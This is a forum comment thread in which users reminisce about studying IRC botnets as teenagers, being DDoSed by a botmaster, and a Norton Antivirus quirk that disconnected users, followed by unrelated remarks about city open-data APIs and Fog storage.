The Steve Gibson story was really interesting. He's a really cool guy, too. My botnet adventures happened around the same time as his, and I too was DDoS'd. We even exchanged a few e-mails about botnets and the script kiddie culture. Those were fun times.
Except when he went on record opposing the addition of raw-sockets to Windows XP saying it would help hackers and spell the end of the world. I remember clutching my Redhat CD, just in case raw sockets were banned ;-)
When I was a teenager I found it fun to intentionally infect myself with malware and try to study it. I know realize this wasn't the most responsible thing to do, as I wasn't in a sandboxed environment, but it was a great learning experience and taught me a lot about networking and security.
One of the biggest malwares I ever managed to infect myself with was a bot, which caused my computer to become a zombie on a ~10K botnet. I spent hours running a packet sniffer and seeing how the client interacted with the IRC network it called home to. Upon connecting to the privately run IRC network, the bot would authenticate with a user and pass. I assume it created one upon connecting the first time to the network. My best guess as to why this is is so that the bot master could track the total number of zombies and compare it to how many were actively connected to the botnet. Kind of a cleaver way to get metrics, now that I think about it.
When I temporarily stopped the bot from connecting to IRC, I decided it might be fun to login as the bot and join the channel I saw it connecting to. Upon joining the channel, I saw thousands of other users on the channel. I spent a couple of days sitting there, masquerading myself as a bot, and watching the botmaster interact with the bots. The botmaster would issue commands that I can't really recall anymore, but I do remember seeing a lot of commands that I assumed told the bots to download extra malware from a remote host. I remember seeing URLs for zip and exe files.
Eventually I got a little bored of this, so I decided to message the botmaster. It was easy to spot him; out of the three ops on the channel, he was the only full op. I tried a "hello" and waited. And waited. And then I was k-lined from the IRC network.
The next day when I logged onto my computer, I found my Internet connectivity was being overwhelmed with bogus TCP requests. I had pissed off the botmaster by snooping, and now I was getting DDoS'd. I imagine he/she commandeered a small number of the bots to do this. It wouldn't take many... I imagine back then, given my bandwidth, 10-15 would have done it.
Fun times. I remember posting about my botnet adventures to Security Focus way back when. Some people got really interested and followed my posts, while other professionals asked me to stop because I wasn't running a sandbox.
IMO, those were different times. I'm not sure I'd recommend something like this these days. After hearing about certain botnets being tied to various mafias and gangs around the world (which is probably more common than you think. See http://www.ibtimes.co.uk/articles/321149/20120329/mafia-cont...), I'm not sure I'd really want to risk interfering with their activities.
It's funny you should say this. I practically did the same thing, from a different perspective.
I ran my own little IRC server when I was a teenager, and one day I noticed a lot of my friends were being disconnected from the server. After some more investigation, it seemed like they were actually being disconnected completely from the Internet. Bit odd.
Upon more investigation, I found an acquaintance had something like 10,000 bots (spybot/rxbot) going through my server (yes, a simple /list could have sufficed...) and when I looked at the topic of his channels, and noticed they consisted primarily of commands to control to the botnet. "startkeylogger" sort of thing.
A few more pokes, I realised it was Norton Antivirus that was listening to port 6667 for any "bad" commands, and then disconnecting the user from the internet. I thought this was hilarious, and went to Efnet, tried it in a large channel and watched 400 people disconnect. Then I felt quite bad, so I emailed Norton, and received no reply.
Something like two years later, I notice the same exploit on the main page of Slashdot, and chaos ensured. It did make me feel pretty cool, "ha! I knew something before all you big uber leet haxxors!" :]
Sadly, my acquaintance didn't mature like the rest of us and decided to use his knowledge and skills to do naughty things, and the FBI got him. Good riddance.
> I tried a "hello" and waited. And waited. And then I was k-lined from the IRC network. The next day when I logged onto my computer, I found my Internet connectivity was being overwhelmed with bogus TCP requests.
I'd probably do the same, upon discovering that one of my bots had become sentient.
This is fantastic. I did the same with a very similar botnet way back when, except my "hello" in IRC wasn't as friendly. Left to eat for an hour, then came back to my hard drive erased. Live and learn...
Thanks! I agree that things like this are pretty fantastic. Part of me misses those days of being so experimental and new to tech. Sorry to hear about your hard drive, though :)
Interesting but when I ran into a similar backdoor on a clients server, it had been infected through a phpbb upload script, I found the password to the IRC server in clear text by using either hexdump or string. Not sure which of the tools but I also tried connecting and found a channel with just around 20-30 bots at the most. Fun experience just like yours.
This reminds me of the push here in NYC for all of the city agencies to open their data via an API. It's gotten better over time, but when the initiative first took flight, it was terrible. Some of the APIs flat out did not work, and the ones that did often returned all sorts of malformed, non-normalized data. It was a nightmare to work with. I'm curious if the government can do better.
Why not just change the storage strategy to saving files locally while in your test environment? Fog lets you do this easily with its configuration options.
I can only imagine this is specific to scenarios where you have to manipulate s3 objects directly and the fog::storage abstraction used for s3 isn't adequate (though I could not example such a scenario specifically)
